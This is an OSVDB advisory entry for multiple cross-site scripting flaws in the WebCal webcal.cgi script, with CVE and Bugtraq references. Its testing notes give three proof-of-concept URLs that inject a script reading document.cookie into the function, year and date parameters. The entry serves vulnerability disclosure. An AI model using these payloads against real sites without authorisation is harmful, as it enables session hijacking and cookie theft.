Michael Arndt WebCal webcal.cgi Multiple Variable XSS

2005-12-16T14:48:36
ID OSVDB:21999
Type osvdb
Reporter OSVDB
Modified 2005-12-16T14:48:36

Description

Manual Testing Notes

http://[target]/perl/webcal.cgi?function=<script>alert(document.cookie)</script>&cal=public
http://[target]/perl/webcal.cgi?function=webyear&cal=public&year=<script>alert(document.cookie)</script>
http://[target]/perl/webcal.cgi?function=webday&cal=public&date=<script>alert(document.cookie)</script>

References:

Vendor URL: http://bulldog.tzo.org/webcal/webcal.html
Secunia Advisory ID: 18017
Related OSVDB ID: 22000
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-12/0206.html
CVE-2005-4327
Bugtraq ID: 15917